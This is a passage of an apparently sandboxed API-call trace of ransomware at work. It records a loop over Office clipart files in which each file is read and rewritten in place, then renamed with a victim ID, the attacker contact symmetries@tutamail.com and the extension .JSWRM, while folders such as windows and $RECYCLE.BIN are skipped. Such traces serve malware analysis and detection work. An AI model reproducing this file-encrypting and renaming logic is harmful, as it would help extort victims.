lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xe10, lpOverlapped=0x0) returned 1 [0092.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.433] CloseHandle (hObject=0x314) returned 1 [0092.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0092.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0092.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0092.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0092.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0092.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0092.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.433] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02356_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02356_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02356_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02356_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0092.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0092.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0092.434] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b584f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6b584f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6b584f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17c4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02361_.WMF", cAlternateFileName="")) returned 1 [0092.434] lstrcmpiW (lpString1="NA02361_.WMF", lpString2=".") returned 1 [0092.434] lstrcmpiW (lpString1="NA02361_.WMF", lpString2="..") returned 1 [0092.434] lstrcmpiW (lpString1="NA02361_.WMF", lpString2="...") returned 1 [0092.434] lstrcmpiW (lpString1="NA02361_.WMF", lpString2="windows") returned -1 [0092.434] lstrcmpiW (lpString1="NA02361_.WMF", lpString2="recovery") returned -1 [0092.434] lstrcmpiW (lpString1="NA02361_.WMF", lpString2="perflogs") returned -1 [0092.434] lstrcmpiW (lpString1="NA02361_.WMF", lpString2="documents and settings") returned 1 [0092.434] lstrcmpiW (lpString1="NA02361_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.434] lstrcmpiW (lpString1="NA02361_.WMF", lpString2="system volume information") returned -1 [0092.434] lstrcmpiW (lpString1="NA02361_.WMF", lpString2="msocache") returned 1 [0092.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0092.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02361_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02361_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02361_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.434] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0092.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0092.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02361_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02361_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02361_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0092.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0092.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0092.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02361_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.435] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6084) returned 1 [0092.435] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17c0) returned 0x205850 [0092.436] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x17c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x17c0, lpOverlapped=0x0) returned 1 [0092.445] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.445] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x17c0, lpOverlapped=0x0) returned 1 [0092.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.445] CloseHandle (hObject=0x314) returned 1 [0092.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0092.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0092.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0092.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0092.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0092.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0092.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.446] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02361_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02361_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02361_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0092.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0092.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0092.447] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b584f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6b584f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6b584f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd28, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02368_.WMF", cAlternateFileName="")) returned 1 [0092.447] lstrcmpiW (lpString1="NA02368_.WMF", lpString2=".") returned 1 [0092.447] lstrcmpiW (lpString1="NA02368_.WMF", lpString2="..") returned 1 [0092.447] lstrcmpiW (lpString1="NA02368_.WMF", lpString2="...") returned 1 [0092.447] lstrcmpiW (lpString1="NA02368_.WMF", lpString2="windows") returned -1 [0092.447] lstrcmpiW (lpString1="NA02368_.WMF", lpString2="recovery") returned -1 [0092.447] lstrcmpiW (lpString1="NA02368_.WMF", lpString2="perflogs") returned -1 [0092.447] lstrcmpiW (lpString1="NA02368_.WMF", lpString2="documents and settings") returned 1 [0092.447] lstrcmpiW (lpString1="NA02368_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.447] lstrcmpiW (lpString1="NA02368_.WMF", lpString2="system volume information") returned -1 [0092.447] lstrcmpiW (lpString1="NA02368_.WMF", lpString2="msocache") returned 1 [0092.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0092.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02368_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02368_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02368_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0092.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02368_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02368_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02368_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0092.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0092.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02368_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.448] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3368) returned 1 [0092.448] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd20) returned 0x23fc98 [0092.448] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xd20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xd20, lpOverlapped=0x0) returned 1 [0092.450] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.450] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xd20, lpOverlapped=0x0) returned 1 [0092.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.450] CloseHandle (hObject=0x314) returned 1 [0092.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0092.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0092.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0092.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0092.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0092.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0092.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.450] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02368_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02368_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0092.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0092.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.451] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf68f613, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf68f613, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6b584f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02371_.WMF", cAlternateFileName="")) returned 1 [0092.451] lstrcmpiW (lpString1="NA02371_.WMF", lpString2=".") returned 1 [0092.451] lstrcmpiW (lpString1="NA02371_.WMF", lpString2="..") returned 1 [0092.451] lstrcmpiW (lpString1="NA02371_.WMF", lpString2="...") returned 1 [0092.451] lstrcmpiW (lpString1="NA02371_.WMF", lpString2="windows") returned -1 [0092.451] lstrcmpiW (lpString1="NA02371_.WMF", lpString2="recovery") returned -1 [0092.452] lstrcmpiW (lpString1="NA02371_.WMF", lpString2="perflogs") returned -1 [0092.452] lstrcmpiW (lpString1="NA02371_.WMF", lpString2="documents and settings") returned 1 [0092.452] lstrcmpiW (lpString1="NA02371_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.452] lstrcmpiW (lpString1="NA02371_.WMF", lpString2="system volume information") returned -1 [0092.452] lstrcmpiW (lpString1="NA02371_.WMF", lpString2="msocache") returned 1 [0092.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0092.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02371_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02371_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02371_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0092.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0092.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02371_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02371_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02371_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0092.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0092.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0092.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02371_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.452] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3188) returned 1 [0092.453] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc70) returned 0x23fc98 [0092.453] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xc70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xc70, lpOverlapped=0x0) returned 1 [0092.458] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.458] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xc70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xc70, lpOverlapped=0x0) returned 1 [0092.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.458] CloseHandle (hObject=0x314) returned 1 [0092.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0092.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0092.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0092.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0092.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0092.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.459] 